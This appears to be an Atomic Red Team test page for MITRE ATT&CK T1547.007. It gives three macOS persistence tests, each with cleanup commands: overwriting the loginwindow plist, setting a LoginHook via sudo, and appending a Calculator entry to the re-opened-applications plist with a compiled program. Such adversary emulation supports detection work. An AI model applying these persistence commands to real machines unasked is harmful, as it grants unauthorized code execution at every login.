T1547.007
Boot or Logon Autostart Execution: Re-opened Applications
Description from ATT&CK
Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named com.apple.loginwindow.[UUID].plist within the ~/Library/Preferences/ByHost directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
Adversaries can establish Persistence by adding a malicious application path to the com.apple.loginwindow.[UUID].plist file to execute payloads when a user logs in.
Atomic Tests
Atomic Test #1 - Copy in loginwindow.plist for Re-Opened Applications
Copy in new loginwindow.plist to launch Calculator.
Supported Platforms: macos
auto_generated_guid: 5fefd767-ef54-4ac6-84d3-751ab85e8aba
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| calc_plist_path | path to binary plist with entry to open calculator | path | PathToAtomicsFolder/T1547.007/src/reopen_loginwindow_calc.plist |
Attack Commands: Run with sh!
1
2
cp #{calc_plist_path} ~/Library/Preferences/ByHost/com.apple.loginwindow.plist
Cleanup Commands:
1
2
rm -f ~/Library/Preferences/ByHost/com.apple.loginwindow.plist
Atomic Test #2 - Re-Opened Applications using LoginHook
Mac Defaults
Supported Platforms: macos
auto_generated_guid: 5f5b71da-e03f-42e7-ac98-d63f9e0465cb
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| script | path to script | path | /path/to/script |
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
1
2
sudo defaults write com.apple.loginwindow LoginHook #{script}
Cleanup Commands:
1
2
sudo defaults delete com.apple.loginwindow LoginHook
Atomic Test #3 - Append to existing loginwindow for Re-Opened Applications
Appends an entry to launch Calculator hidden loginwindow.*.plist for next login. Note that the change may not result in the added Calculator program launching on next user login. It may depend on which version of macOS you are running on.
Supported Platforms: macos
auto_generated_guid: 766b6c3c-9353-4033-8b7e-38b309fa3a93
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| objc_source_path | path to objective C program | path | PathToAtomicsFolder/T1547.007/src/append_reopen_loginwindow.m |
| exe_path | path to compiled program | path | /tmp/t1547007_append_exe |
Attack Commands: Run with sh!
1
2
3
4
5
6
7
8
9
FILE=`find ~/Library/Preferences/ByHost/com.apple.loginwindow.*.plist -type f | head -1`
if [ -z "${FILE}" ] ; then echo "No loginwindow plist file found" && exit 1 ; fi
echo save backup copy to /tmp/
cp ${FILE} /tmp/t1547007_loginwindow-backup.plist
echo before
plutil -p ${FILE}
echo overwriting...
#{exe_path} ${FILE} && echo after && plutil -p ${FILE}
Cleanup Commands:
1
2
3
4
5
6
7
8
rm -f #{exe_path}
# revert to backup copy
FILE=`find ~/Library/Preferences/ByHost/com.apple.loginwindow.*.plist -type f | head -1`
if [ -z "${FILE}" ] ; then
exit 0
fi
mv /tmp/t1547007_loginwindow-backup.plist ${FILE}
Dependencies: Run with bash!
Description: compile C program
Check Prereq Commands:
1
2
if [ -f "#{exe_path}" ]; then exit 0 ; else exit 1; fi
Get Prereq Commands:
1
2
cc #{objc_source_path} -o #{exe_path} -framework Cocoa